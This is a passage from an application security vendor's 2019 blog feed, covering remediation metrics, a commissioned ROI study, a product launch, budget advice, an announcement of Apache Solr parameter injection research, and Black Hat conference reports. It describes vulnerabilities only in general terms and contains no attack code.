teams are on the same page when it comes to the priority level of AppSec, or if they get along at all! The more insight your SPM has into your organization, the better prepared you can be ??? as a team ??? to work together moving forward.</p> <h4><strong>Align your goals and expectations appropriately</strong></h4> <p>Often, the goals that customers set up with Veracode and the goals within their own organizations tend to be two different things. Establish a list of realistic goals, and be prepared to take incremental steps to get there. Rome wasn???t built in a day, and neither is a fully mature application security program.</p> <p>Once you have your manageable goals, establish who is responsible for each one, and how they???re going to be held accountable for meeting each goal. You???ll need to establish clear channels of communication and accountability internally ??? for example, when you???re coming up with a plan to remediate flaws, engage development and product management as soon as you have flaw scopes. Make sure that the amount of remediation you???re targeting is realistic for the desired deadline, and let development know about the remediation resources available in the Veracode platform and in the Services organization in case they get stuck. Your SPM can absolutely help you have that conversation!</p> <p>When it comes to expectations, have an understanding of the driver behind <em>why</em> Veracode was purchased. In some cases, your buyer might not communicate the driving factor to the person running the program ??? maybe you! Regardless of which end you???re on, make sure that your internal plan is well-communicated with everyone who???s involved across the organization.</p> <p>At the end of the day, we want you to be successful in your application security journey. By keeping these tips in mind, you???re already one step closer to success. You can find out more by talking to other Veracode customers about how they???ve found success with their application security programs in the <a href=""><strong>Veracode Community</strong></a>.</p> Tue, 03 Sep 2019 10:07:53 -0400 (adewberry) ver43016 Veracode Customers Improve Mean Time to Remediation by 90% <img src="/sites/default/files/styles/resize_960/public/2020-01/Veracode%20Forrester%20TEI%20Blog%20Post_0.png?itok=Q5WkcETQ" width="960" height="480" alt="" typeof="foaf:Image" /><p>Bill Gates is well known for treating time as a scarce resource, and in 1994, John Seabrook published a piece in <em>The New Yorker</em> <a href="">detailing an email exchange</a> he carried on with the famous technologist. Seabrook notes that Gates??? reverence for time was evident in his correspondence ??? skipping salutations and pleasantries, leaving spelling mistakes and grammatical errors in-line, and never addressing the journalist by his name. In one of the emails, Gates wrote that, ???the digital revolution is all about facilitation ??? creating tools to make things easy.???</p> <p>Software is the heart of the global economy, and it has paved the way for increased productivity, simplified workflows, and has helped leaders build businesses beyond their wildest dreams. It has changed the way that security practitioners and developer teams view and manage time, through agile methodology and sprint planning facilitated by tools like JIRA.</p> <p>Just as minutes, hours, and days can be the difference between meeting sprint deadlines and maintaining speed to market, time is also the difference between preventing a <a href="//">massive data breach</a> and being the victim of one. However, although a cutting-corners approach may work well for email correspondence between colleagues, and perhaps journalists, using this timesaving approach when crafting code has the potential to be downright dangerous. Organizations today need to balance time to market and code quality, which includes code security.</p> <p><strong>How organizations reduced mean time to remediation and saw a 63% ROI with Veracode </strong></p> <p>We recently commissioned the Forrester Total Economic Impact<sup>TM</sup> of Veracode Application Security Platform to learn how our customers??? security and developer teams are strengthening the security posture of their applications by reducing mean time to remediation (MTTR) by implementing DevSecOps practices using our solutions. Based on interviews with Veracode customers in insurance, healthcare, finance, and information technology services, Forrester created a TEI framework, composite company, and an associated ROI analysis to illustrate financial impact.</p> <p>The report found that prior to using Veracode, the composite organization experienced 60 flaws per MB of code, though they were using other application security testing solutions. After adopting the Veracode Platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50 percent to 90 percent over three years.</p> <p>Additionally, by implementing DevSecOps practices, building stringent security controls, and integrating vulnerability testing into their CI/CD pipeline, our customers were able to reduce mean time to remediation by 90 percent. Resolutions that previously took 2.5 hours on average were reduced to 15 minutes, helping developers reduce their time spent remediating flaws by 47 percent. This stands to reason, given that our <a href="//">State of Software Security Volume 9</a> (SOSS Vol. 9) found that the most active DevSecOps teams fix flaws 11.5x faster than the typical organization.</p> <p>By using <a href="//">Veracode Greenlight</a> and <a href="//">Veracode Software Composition Analysis</a>, developer teams were able to identify issues while they were coding, which reduced the likelihood that flaws would enter later stages of production. What???s more, our customers??? developer teams introduced fewer flaws to their code, and those flaws took less time to resolve because we offered them contextual information related to the data path and call stack information of their code.</p> <p><strong>It???s not enough to find security flaws quickly if you???re not remediating the right ones quickly</strong></p> <p>Most companies <a href="//">prioritize high-severity and critical vulnerabilities</a> because they are less complicated to attack, offer greater opportunity for complete application compromise, and are more likely to be remotely exploitable. The trouble is that if a low-severity vulnerability is present in the execution path, it may put your application at greater risk than a high-severity vulnerability if your application is never calling upon that severe vulnerability in the first place. The exploitability of a vulnerability is a critical consideration many organizations overlook.</p> <p>In our analysis of flaw persistence in SOSS Vol. 9, we found that organizations hit the three quarters-closed mark about 57 percent sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low-severity flaws were attended to at a significantly slower rate than the average speed of closure. It took organizations an average of 604 days to close three quarters of these weaknesses.</p> <p>With many tools out there, developers will receive an extremely large list of vulnerabilities, including those open source libraries packaged in your application, and they will have to make a judgment call on <a href="">what to fix first</a> ??? and how much is worth fixing before pushing to production. The stark reality is that the time it takes developers to fix security flaws has a much larger impact on reducing risk than any other factor.</p> <p>Veracode offers developers the opportunity to write secure code, limit the vulnerabilities introduced into production, and prioritize vulnerabilities with our <a href="">vulnerable method approach</a>, expert <a href="//">remediation coaching</a>, and <a href="//">security program managers</a>. To learn more about how the Veracode Platform enables security and development teams to work in stronger alignment, reduce mean time to remediation, and boost an organization???s bottom line, download the <a href="">Forrester Total Economic Impact<sup>TM</sup> of Veracode Application Security Platform</a>.</p> Tue, 03 Sep 2019 08:30:00 -0400 (lpaine) ver41566 Should You Be Measuring Flaw Rate? <img src="/sites/default/files/styles/resize_960/public/AppSec_metrics.png?itok=jijKPVvZ" width="960" height="480" typeof="foaf:Image" /><p>Metrics ??? or perhaps more accurately, the right metrics ??? are crucial for understanding what???s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization???s current state, and also show what progress it???s making in achieving its objectives.&nbsp;</p> <p>We typically recommend our customers measure their compliance against their own internal AppSec policy, plus scan activity, flaw prevalence, and time to resolve.&nbsp;</p> <p>Flaw rate is another metric you might want to consider tracking. Although this would be a secondary metric, unlike the primary ones listed above, flaw rate, which allows you to do a before-and-after flaw comparison for an application, provides insight into how your rate of security findings is improving over time. Veracode analytics allows you to create the flaw rate metric by using a formula and adding it to your chart in order to visualize the rate alongside any other data you are reporting ??? such as flaw rate per application, first scan vs most recent scan, or flaw rate per an application per severity of the finding.</p> <p>Keep in mind that this metric, as with flaws per MB, can vary significantly based on the size of the codebase. A monolithic, legacy application is going to have a much different flaw rate (and flaw density as measured by flaws per MB) than a small, new microservice. The value lies in comparing an application???s initial flaw rate to the current flaw rate, or comparing the flaw rate for a team across several applications (again the initial flaw rate vs. the current). This allows users to get a handle on what is working ??? or not ??? for that team to help them close out security findings and reduce the number they are introducing in the first place. In this way, you could validate the impact of your AppSec eLearning or other trainings. I would caution against comparing flaw rate (again much like flaws per MB) between teams or between business units as this won???t directly provide much actionable insights beyond which one is doing better.&nbsp;</p> <p>Note that this metric will not produce an accurate gauge of your program???s success. Since it is applicable only to static analysis, it doesn???t take all testing techniques into account. Policy compliance is ultimately the best metric for measuring and reporting on the overall progress of your program.</p> <p>But you could use flaw rate as an additional data point, alongside the following metrics, when reporting on the effectiveness or progress of your AppSec program:</p> <p><strong>Policy compliance</strong>: Your application security policy should stem from an analysis of your entire application inventory. From there, you assign groups of applications different risk categories or ratings by asking questions such as:</p> <ul> <li>Do these applications touch PII?</li> <li>Are they Internet-facing?</li> <li>What would be the impact of a compromise to this system (i.e., are they business critical)?</li> </ul> <p>Based on those answers, you can determine which scan frequency and testing types are required, as well as which types or severities of flaws to disallow: an Internet-facing application that contains PII will have a different risk categorization from an internal chat service and thus should be held to a different standard for security.</p> <p>Additionally, this risk rating will determine frequency of scanning requirements. Low-risk functionality that is rarely updated does not need to be scanned every week, but that Internet-facing/PII app may require a scan for every commit.</p> <p><strong>Average time to resolve: </strong>Many application testing solutions focus on scan activity rather than addressing results. While apps need to be scanned, fixing those security findings in a timely manner is a better mechanism for evaluating your application security program<strong>. </strong>Time to resolve provides visibility into how many days it takes for a finding to be closed after it is first discovered, helping security teams better understand where there may be bottlenecks in the development and security process.</p> <p><strong>Flaw prevalence</strong>: This metric spotlights how common a risk is within a particular industry or business. It helps an organization prioritize threats such as SQL injection, Cross-Site Scripting (XSS), cryptographic issues, and CRLF injection based on real-world impact.</p> <h4><strong>Learn more about flaw rate</strong></h4> <p>For detailed instructions on measuring flaw rate, please see <a href="">this article</a> in the Veracode Community.</p> Tue, 27 Aug 2019 11:53:39 -0400 (anielsen) ver42926 Veracode Now Available on the Digital Marketplace G-Cloud UK <img src="/sites/default/files/styles/resize_960/public/gcloud-blog-background.jpg?itok=Ca9ZxiQA" width="960" height="480" alt="G Cloud Blog Featured Image" title="G Cloud Blog " typeof="foaf:Image" /><p>There is a deepening awareness that cyberthreats can never be eliminated completely, and digital resilience is an absolute necessity ??? and this is true for both private and public sector organizations and agencies. With this understanding, the UK Government created its <a href="">G-Cloud Framework</a>, which has transformed the way that public sector organizations can purchase information and communications technology in order to better build secure digital foundations. The program allows public bodies to buy commodity-based, pay-as-you-go cloud services through government-approved, short-term contracts via the <a href="">Digital Marketplace</a>. This procurement process supports the UK Government's <a href="">Cloud First</a> policy, as well as its desire to achieve a ???Cloud Native??? digital architecture.</p> <p>Strengthening the security posture of your applications is critical in strengthening the security posture of your organization, and the <a href="//">Veracode Platform</a> was created as a cloud-based application security solution because of the multitude of advantages it offers our customers. Not only are you able to avoid the expenses associated with purchasing hardware, procuring software, managing deployment and maintaining systems, you are also able to implement immediately ??? which means seeing results and value on day one. We???ve now made it even simpler for organizations within the UK to secure their application security portfolio: The Veracode Platform and <a href="//">services</a> are now available for purchase on the <a href="//"> Digital Marketplace</a>.</p> <p><strong>Revolution not Evolution: How the UK Government Created a Cloud First Initiative</strong></p> <p>In 2010, the UK Government began a revolution that has influenced the way in which nations around the world are conducting business and structuring cybersecurity programs within their own government bodies and organizations. The creation of <a href="">Government Digital Service</a> (GDS), a consumer-facing portal and link for businesses that simplifies interacting with the government, led way to the adoption of a <a href="">Cloud First policy</a> for all government technology purchases.</p> <p>The GDS team was created to more fundamentally rethink how government works in the modern era, with the aim to establish a digital center for the UK government that would bring the talent in-house, rather than relying on vendor expertise to make changes to government web applications and properties. The ultimate goal was to fix and enhance the way that people interact with the government, embed skills and capability across the government so that it could work in a new way, and open up data and APIs so other people could build on government-developed services.</p> <p>The re-architecting of the government website began with a whiteboard and a heavy focus on user needs. The small team worked together to build a hub that would evoke a response, understanding that leading with imagery was really powerful, and iterated, changed, and improved as they honed in on the users??? needs. At that time, no other government technology had run in an agile fashion.</p> <p>And then GDS team took it one step further by making all of its <a href="">GitHub repositories open</a>, because they considered it to be the people???s code, they wanted the people to help make their code better, and they knew it would make recruitment simpler if they could more easily show potential candidates what was under the hood. It allowed for different agencies within the government to work together more openly, which helped to reduce the risks associated with the open source code everyone was using.</p> <p><strong>The Cloud First Policy</strong></p> <p>This new approach to development also called for new processes and policies for acquiring software and working with technology vendors. In 2013, the UK government adopted a <a href="">Cloud First</a>, or Cloud Native, policy for all technology decisions. By operating in a Cloud Native framework, the government is able to adapt to how they organize their work to take advantage of what???s available in the market and any emerging technologies. This new policy made it mandatory to consider cloud solutions before alternatives, as well as making it necessary to demonstrate why non-cloud technologies would provide better value for the money if opting for an on-premise solution.</p> <p>Further, the policy states that the government must also consider public cloud first ??? to consider <a href="//">SaaS models</a>, particularly for enterprise IT and back office functions ??? and Infrastructure as a Service and Platform as a Service. The GDS team understands that without adapting and adopting technologies and focusing on core outcomes and principles, it won???t be able to meet the expectations of its users, and it won???t be prepared for the changes likely to arise as they manage growing volumes of data, and a proliferation of devices and sensors.</p> <p>To truly become cloud native, the GDS transformed how it monitors and manages distributed systems to include diverse applications. It continues to deepen the conversations with vendors about the standards that will help them manage these types of technology shifts. Most of all, it continues to ensure it always chooses cloud providers that fit the needs at hand, rather than basing choices on recommendations.</p> <p><em>To learn more about Veracode???s offerings on the Digital Marketplace G-Cloud UK, including our application security platform and services, </em><a href="//"><em>click here</em></a><em>.</em></p> Thu, 22 Aug 2019 07:15:00 -0400 (lpaine) ver42846 Introducing the New Veracode Software Composition Analysis <img src="/sites/default/files/styles/resize_960/public/sca-launch-product-blog.png?itok=DxZShG_l" width="960" height="480" typeof="foaf:Image" /><p>Open source technology empowers developers to make software better, faster, and more efficiently as they push the envelope and delight users with desired features and functionality. This is a trend that is unlikely to fade ??? at least not in the foreseeable future ??? and has further fueled our passion for securing the world???s software. This is also why Veracode acquired SourceClear ??? we had a vision for the impact that integrating our software composition analysis (SCA) technologies would have on our customers??? ability to develop bold, revolutionary software using open source code ??? without risking their security posture.</p> <p>Today, our customers have access to an industry-leading, scalable SCA solution that provides unparalleled support for SCA in DevSecOps environments through the cloud-based Veracode Application Security Platform. Veracode SCA offers a unique vulnerable method detection technology that increases the actionability of SCA scan results, as well as the ability to receive continuous alerts on new or updated vulnerabilities without rescanning an application.</p> <p>Further, our solution relies on a proprietary library and vulnerability database, built using true machine learning and data mining, which has the ability to identify vulnerabilities not available in the National Vulnerability Database (NVD). In addition to CVEs, the database now also includes Reserved CVEs and No-CVEs detected with our data mining and machine learning models. These results are verified by our expert data research team for all supported languages.</p> <p><strong>Software Composition Analysis for DevSecOps Environments</strong></p> <p>Veracode SCA offers remediation guidance, SaaS-based scalability, and integration with Continuous Integration tools to provide users with visibility into all direct and indirect open source libraries in use, known and unknown vulnerabilities in those libraries, and how they impact applications, without slowing down development velocity.&nbsp;</p> <p>Additionally, it is the only solution in the market that offers two options to start an SCA scan that offers insight into open source vulnerabilities, library versions, and licenses:</p> <p><strong>Scan via Application Binary Upload </strong></p> <p>Through the traditional application upload process, you???re able to upload your applications or binaries to the Veracode Application Security Platform so that you can run scans via the UI or an API.</p> <p>SCA scans continue to run alongside Veracode Static Analysis. During the pre-scan evaluation for static scanning, Veracode executes the SCA scan to review the application???s composition, and the results are delivered while the static scan continues. Bill of materials, scores, policy definition, and open source license detection remain available for those application upload scans.</p> <p>Veracode has also added language support for applications developed in Golang, Ruby, Python, PHP, Scala, Objective-C, and Swift, in addition to the existing support for Java, JavaScript, Node.js, and .NET applications.</p> <p><strong>Agent-Based Scanning</strong></p> <p>Agent-based scanning, integrated within the Veracode Application Security Platform, enables you to scan your source code repositories directly, either manually from the command line or in a Continuous Integration pipeline. The agent-based scanning process has been enhanced to include more open source license types available for detection in open source libraries. The libraries and vulnerabilities database has been enhanced with an increase of new vulnerabilities detected, and the ability to link project scans with application profiles for policy compliance, reporting, and PDF reports. Customers using Veracode SCA agent-based scanning can conduct:</p> <ul> <li><strong>Vulnerable Method Detection:</strong> Pinpoint the line of code where developers can determine if their code is calling on the vulnerable part of the open source library.&nbsp;</li> <li><strong>Auto Pull Requests:</strong> Veracode SCA identifies vulnerabilities and makes recommendations for using a safer version of the library. This feature automatically generates pull requests ready to be merged with your code in GitHub, GitHub Enterprise, or GitLab. It provides the fix for you.</li> <li><strong>Container Scanning:</strong> Scan Docker containers and container images for open source vulnerabilities in Linux distributions and base libraries.&nbsp;</li> </ul> <p>Users have the flexibility to use both scanning types for the same application. Agent-based scanning can be used during development, and a traditional binary upload scan can be conducted before the application is put into production. Scan results continue to be assessed against the chosen policy and prompt users to take action based on the results. These actions can be automated with integration to Jenkins (or another Continuous Integration tool) to either break the build because of a failed policy scan, or to simply report the failed policy.</p> <p>It???s no exaggeration to say that every company is becoming a software company, and the adoption of open source is on the rise. Having clear visibility into the open source components within your application portfolio reduces the risk of breach through vulnerabilities. The new Veracode Software Composition Analysis solution helps our customers confidently use open source components without introducing unnecessary risk.&nbsp;</p> <p>To learn more about Veracode Software Composition Analysis, download the technical whitepaper, ???<a href=""><em>Accelerating Software Development with Secure Open Source Software</em></a>.???</p> Mon, 19 Aug 2019 13:50:33 -0400 (jperez) ver42831 Key Ways to Make the Case for AppSec Budget <img src="/sites/default/files/styles/resize_960/public/AppSec_slice_security_budget.png?itok=jPLEb5pc" width="960" height="480" typeof="foaf:Image" /><p>Security departments are juggling a multitude of security initiatives, and each is competing for a slice of one budget. How do you make the case that AppSec deserves a slice of that budget pie, or a bigger slice, or even to make the pie bigger? Here are a few key ways:</p> <h4><strong>Find a compelling event</strong></h4> <p>The most obvious compelling event, of course, is a breach, but there are other events that will compel executives to budget for application security. For instance, regulations could be a compelling event ??? if you have to comply with a security regulation (PCI, NY DFS cybersecurity regulations, etc.) or pay a fine, that???s an easy budget win. In addition, customers asking about the security of software could be a compelling event. IT buyers are increasingly asking about the security of software before purchasing. We recently conducted <a href="">a survey of IT buyers with IDG</a>, and 96 percent of respondents reported that they are more likely to consider doing business with a vendor or partner whose software has been independently verified as ???secure.??? Sales losing a deal because they couldn???t respond to a security audit would certainly be considered a compelling event.</p> <h4><strong>Look to the future</strong></h4> <p>A clear road map and plan for your AppSec program not only gives you more credibility, but also helps to ???warm up??? your investors to what you???re planning on doing in future years. Show the efficiencies and risk reduction your program will make in the future to highlight how upfront investment will lead to future results. For instance, an investment in developer training will make developers more self-sufficient and lessen the burden on security teams.</p> <h4><strong>Benchmark </strong></h4> <p>It can be powerful to illustrate where your organization???s security program sits relative to other organizations and your peers. If you're lagging, it???s a clear indication that further investment is needed. If you're leading, you can use that fact to prove your progress and make the case for more ambitious projects.</p> <p>Veracode???s <a href="//"><em>State of Software Security</em></a> is a good benchmarking resource, as is the <a href="">OpenSAMM</a> framework. The <em>State of Software Security</em> report includes comparisons by industry, so you can point to the application security progress made by others within your own industry. In addition, OWASP???s Application Security Verification Standard (<a href="">ASVS</a>) can help organizations to classify applications into three different levels from low to high assurance. This helps firms to allocate security resources based on the software???s business importance or risk breach.</p> <h4><strong>Know your audience</strong></h4> <p>Speak the language of executives when making the case for more budget. For instance, telling the CFO, ???we've reduced the number of SQL injections??? won???t resonate. Rather than the number of SQL injections, talk about how the program will reduce the number of breaches by X percent, or how it will reduce the cost to fix vulnerabilities by X percent. Be mindful of your audience and frame your budgeting conversation accordingly.</p> <h4><strong>Be visible and credible</strong></h4> <p>The more credible you are, the better your chances of getting the budget you???re asking for. Clearly understand what you're going to do with the money, and how you're going to justify that spend. Prove that you understand how your organization works and that you will use the money effectively. Finally, tie application security to business priorities and initiatives, and be able to show a clear roadmap for your program.</p> <p>In addition, be visible. It's important to promote success of your program. Present on the progress you???re making, run awareness sessions, or have visible dashboards.</p> <h4><strong>Break down your budget (must, should, could)</strong></h4> <p>You???ll have a range of priorities and things that you could be spending money on in your AppSec program. Give your budget stakeholder options. Start with what you must do ??? for instance, what you need to achieve for regulatory compliance. And then give them some wiggle room in the middle on projects that they <em>should</em> or <em>could</em> do. If you go in with a number in mind and don't get it, be ready to slice and dice your budget request.</p> <h4><strong>Learn more</strong></h4> <p>Get more details on these strategies and additional tips and advice on making the case for AppSec budget in our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Thu, 15 Aug 2019 17:07:13 -0400 (sciccone) ver42811 As Cyberattacks Increase, So Does the Price of Cybersecurity Professionals <img src="/sites/default/files/styles/resize_960/public/shutterstock_680761051_tiny.png?itok=9Xyv8Z-e" width="960" height="480" typeof="foaf:Image" /><p>Cyberattacks are on the rise, and companies are noticing. Everyone is in a scramble to avoid being the next corporation sweeping news headlines with the words ???data breach??? following. As a result, the demand for cybersecurity experts is skyrocketing, but there are a couple of problems. Not only are there not enough cybersecurity experts to fill those roles, but for the cybersecurity experts that <em>are</em> out there, they???re demanding a premium for their talents.</p> <p>A <a href=""><strong>recent Bloomberg article</strong></a> stated that in 2012, an enticing rate for a chief information security officer at a large company was $650,000. Fast forward to 2019, and the same role at the same company is going for $2.5 million. On top of that, the article points to data that shows there were more than 300,000 unfilled cybersecurity jobs over a 12-month period in the United States in 2017-2018. When looking to the future, <a href=""><strong>Cybersecurity Ventures predicts</strong></a> that the amount of unfilled positions will grow to about 3.5 million jobs.</p> <p>So, the problem itself is double-pronged. Companies are recognizing that they need to address cybersecurity in some way, shape, or form, and are looking to bring in experts to help them out ??? but those experts come at a very high cost.</p> <p><strong>Alternatives to the salary game</strong></p> <p><em>Security champions</em></p> <p>Hiring additional security professionals does not have to be the starting point for your company to take the leap into more secure software. One practical way to embed security into your organization, and get more from your existing security team, is to look for ??? and create ??? security champions on your development teams. Step one is finding a security-minded individual on your development team, and then giving them extra training, responsibilities, and perks to incentivize them to be that security liaison. Developers will be much more inclined to take security advice from someone who???s already familiar with their lingo and processes.</p> <p>Ultimately, with a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <p><em>For more information on security champions, check out </em><a href="//"><strong><em>this Veracode guide</em></strong></a><em>.</em></p> <p><em>Outside partners</em></p> <p>As organizations struggle to find the right people to step in and oversee their programs, another effective way to ensure you have your bases covered is by bringing in an outside partner. Having a solution like that offers hands-on support, coaching for developers, and AppSec expertise can make a world of a difference. We aren???t suggesting you replace your internal team with outside consultants; rather, that you free your team to focus on managing risk by taking these tasks off of their plates:</p> <ul> <li>Addressing the blocking and tackling of onboarding</li> <li>Application security program management</li> <li>Reporting Identifying and addressing barriers to success</li> <li>Working with development teams to ensure they???re finding and remediating vulnerabilities</li> </ul> <p><em>Learn more about the benefits of bringing in an outside partner </em><a href="//"><strong><em>in this blog</em></strong></a><em>. </em></p> <p><em>Automation</em></p> <p>While you try to find the balance between keeping your headcount low, yet covering all of your bases from a security standpoint, a fantastic way to tie your approach together lies within utilizing automated security solutions. You can remove the need for human intervention as much as possible, continue to enable your developers to test for flaws early and often, and integrate a solution that works in tandem with your current environment. Having the security champions, automated solutions that are easy to work with, and a partner who can help your developers out when they run into roadblocks are all effective ways to reduce your risk ??? and without breaking the bank.</p> <p>Want to find out how Veracode can help you check off all of these boxes and more? Request a personalized <a href=""><strong>demo of our platform</strong></a> today.</p> Wed, 14 Aug 2019 13:00:00 -0400 (vlattell) ver42746 New Research: Apache Solr Parameter Injection <img src="/sites/default/files/styles/resize_960/public/default_images/default_fullsize_image_1600x800_Generic_2.png?itok=gTO2COUK" width="960" height="378" alt="" typeof="foaf:Image" /><p>Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You treat it like a database: you run the server, create a collection, and send different types of data to it (such as text, XML documents, PDF documents, etc.). Solr automatically indexes this data and provides a fast but rich REST API interface to search it. The only protocol to talk to the server is HTTP, and yes, it's accessible without authentication by default, which makes it a perfect victim for keen hackers.</p> <p>In a new research paper, Veracode Security Researcher <a href="//">Michael Stepankin</a> sheds light on this new type of vulnerability for web applications ??? Solr parameter injection ??? and explains how cyberattackers can achieve remote code execution through it. Whether the Solr instance is Internet-facing, behind the reverse proxy, or used only by internal web applications, the ability to modify Solr research parameters is a significant security risk. Further, in cases where only a web application that uses Solr is accessible, by exploiting 'Solr (local) Parameters Injection,' it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution.</p> <p>Read the in-depth, technical whitepaper, ???<em>Apache Solr Injection</em>,??? on <a href="">GitHub</a>.</p> Wed, 14 Aug 2019 08:30:00 -0400 (lpaine) ver42706 Live From Black Hat USA: Making Big Things Better the Dead Cow Way <img src="/sites/default/files/styles/resize_960/public/Cult_Dead_Cow_BlackHat.png?itok=CVjAFchZ" width="960" height="480" typeof="foaf:Image" /><p>When Reuters??? investigative reporter Joseph Menn confirmed that presidential candidate Beto O???Rourke was an early member of The Cult of the Dead Cow (cDc), it seemed as though folks had two viewpoints on it. They either had more respect for him because they understood what cDc was trying to accomplish, or they were relatively horrified because ???hackers are bad.??? It???s easy to fear what we don???t understand, and what is often shed in a bad light.</p> <p>In InfoSec, we know and understand that hackers are not inherently bad. Many of them are hactivists looking to make positive change in the world. During the Black Hat panel discussion, ???Making Big Things Better the Dead Cow Way,??? Menn talked about how O???Rourke was 14 or 15 years old when he joined the cDc and left before the organization grew in notoriety, and that he interviewed a neo-Nazi in Texas and proceeded to let him hang himself with his own words. Even at that young age, he was all about diversity and engagement, especially within the cDc.</p> <p>Mudge Zatko, a prominent member of L0pht and the cDc, who went on to be a program manager at DARPA, shared what he thought stood out most about O???Rourke, saying, ???You can form groups online, but when you get together and meet the person, are they who you thought? You met [Beto] and he was a very friendly guy.???</p> <p>This story matters because in order to make change, you have to understand where your power and influence lie to have the best results. For O???Rourke, that looks like running for president. For the cDc, it was acknowledging that hackers have power and influence. With the understanding that computers and encryption could be leveraged to help human rights efforts, the group made a more public move toward hactivism.</p> <p>???What can you do to make the world a better place? How do we leverage this power? Use that to go through the media, and hopefully through some sort of technology, but especially through our connections to the media and use the influence of our long history,??? said Mudge.</p> <p>While Veracode co-founder Christien Rioux, or Dildog, opted to work with the private sector to tackle issues of security at a wide-scale by creating the technology that would become static binary analysis and Veracode, there are many who opt to take more of a hactivist approach. As with anything else, there are varying views on what hactivism is and what it isn???t ??? which parallels with debates about what human rights truly encompasses.</p> <p>???What is your definition of human rights? Just governmental interaction because of civil liberties, or is it applicable to private organizations,??? asks Luke Benfey (aka Deth Veggie). ???Some believe it is and some believe it isn't. There are philosophical disagreements about what is ethically valid. Some believe that DDOS or web defacement is not applicable as legitimate means of protest, and others believe it is a legitimate means of protest. These are things that are still going on, and I don't necessarily think that the kinds of hactivism have changed radically, so much as scale has changed; the Internet and access to it has spread much more widely around the world.???</p> <p>With broader access comes broader awareness and even broader responsibility: once something is seen it can???t be unseen. While we certainly see malicious cyberattacks making headlines, a lot of good is being done by the hacktivist community as well. Just look to discussions around coordinated disclosure and the ways in which security researchers are working with private and public organizations to make them ??? and all of us ??? safer.</p> <p>If you???re looking for something to do, and want real proof of the cDc???s hacktivist ethos, we were told that if you search the former Yugoslavia website for cDc in the case files pertaining to former Yugoslav president Slobodan Milosevic???s trial for war crimes, you???ll see that they pop up a lot for their work helping prosecutors.</p> <p>Or you could just watch this video Q&amp;A where Veracode Co-Founder Chris Wysopal (@WeldPond) interviews Menn, Rioux, and Deth Veggie about the cDc and Menn???s book, ???Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World??? at this year???s Black Hat.</p> <p><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe></p> Fri, 09 Aug 2019 09:36:36 -0400 (lpaine) ver42701 Live From Black Hat USA: The Inevitable Marriage of DevOps & Security <img src="/sites/default/files/styles/resize_960/public/shutterstock_1062446840.png?itok=QYbkkkiY" width="960" height="480" typeof="foaf:Image" /><p>During her briefing with Kelly Shortridge, vice president of product strategy at Capsule8, Dr. Nicole Forsgren, research and strategy at Google, did a beautiful job of adding imagery to the story she told of the attendee reactions during the now-famous talk Paul Hammond and John Allspaw <a href="">gave at Velocity in 2009</a>. If you're not familiar, the title of said talk was, "10 Deploys Per Day: Dev &amp; Ops Cooperation at Flickr."</p> <p>Forsgren recalled that, "The room was split. At the end of this process, large pieces of code would be deployed and, basically, lit everyone on fire. Half the room was amazed and it was changing the world. Half of the room said they were monsters and how dare they light people on fire 10 times per day." Forsgren concluded that "DevOps has crossed the chasm - the business benefits are too striking. We see most of the industry doing this. There is no turning the ship around."</p> <p>Indeed, DevOps has long moved beyond the conceptual and has become a widely adopted practice in software development and delivery. It gave birth to the InfoSec equivalent of DevSecOps and the concept of "shifting security left." From where I sit within Veracode, I see the ways that many security solutions providers are doing their best to provide developers with the tools they need to embed security into their workflow, yet it???s clear that there is still more to be done to get InfoSec professionals on board.</p> <p>"James Wickett has said the ratio of engineers in development, operations, and InfoSec in a typical technology organization is 100:10:1. If we integrate [InfoSec professionals] earlier to have input, the shift left can build a more collaborative culture, contribute to amazing outcomes - like stability, reliability, and resiliency," Forsgren said. "We need to build secure systems, and we will find ways to do this. We know this is super important, and security is the next frontier. Security can contribute to this and join DevOps. Or you can stand aside as DevOps figures this out and carves its own path. I would love to see InfoSec contributing the expertise we just don't have."</p> <p>Forsgren was clearly echoing the sentiment Dino Dai Zovi expressed in his conference keynote. Certainly, the concept of being lit on fire 10 times per day would create a fight-or-flight response, and it is much easier to go to no than to go to yes. Yet, when Forsgren spoke about the benefits of this type of work, she explained that what InfoSec pros would face would be mini-fires with a smaller blast radius. She argues that it is time for InfoSec to say, "no, and??ヲ"</p> <h4><strong>The Security of Chaos</strong></h4> <p>It appeared that Shortridge couldn't have agreed more.</p> <p>"The real DevOps will be held accountable for security fixes," said Shortridge. "So what should goals and outcomes become? Why should InfoSec and DevOps goals diverge? InfoSec should support innovation in the face of change - not add friction. InfoSec has arguably failed, so 'this is how we've always done it' is invalid. The greatest advances in security are rarely spawned by the security industry."</p> <p>In other words, it's time to start jumping out of the proverbial planes in order to face our fears and start doing things differently in security. Shortridge reminded us that it is inevitable that things will fail and things will be pwned, which is why she is a proponent of adopting chaos engineering. <a href="">Chaos engineering</a> is the discipline of experimenting on a software system in production to provide your organization with a level of confidence in the system's capability to withstand turbulent and unexpected conditions, while still creating adequate quality of service (resiliency) during difficult times.</p> <p>The concept of chaos engineering was created while Greg Orzell was overseeing Netflix's migration to the cloud in 2011. He wanted to address the lack of adequate resilience by creating a tool that would cause breakdowns in their production environment - the one used by Netflix customers. In doing this, the team could move from a development model that assumed no breakdowns to one where they were considered inevitable. This encouraged developers to build resilience into their software from the start. By regularly "killing" random instances of software service, they could test redundant architecture to make sure that a server failure wouldn't noticeably impact the customer experience.</p> <p>"Expect your security controls will fail and prepare accordingly. System architectures must be designed assuming the controls and users will fail," she said. "Users very rarely follow the ideal behaviors. Don???t try to avoid incidents. Embrace your ability to respond to them. Ensure that your systems are resilient enough to handle incidents gracefully. Pivot toward realistic resilience."</p> <p>If your team can plan for nothing but the chaos factor, then you should understand that there are true benefits to applying chaos resilience, including lower remediation costs, decreased stress levels during real incidents, and less burnout.</p> <p>"Incidents are a problem with known processes, rather than fear and uncertainty. It creates feedback loops to foster understanding of systemic risk. Chaos engineering does this to help us 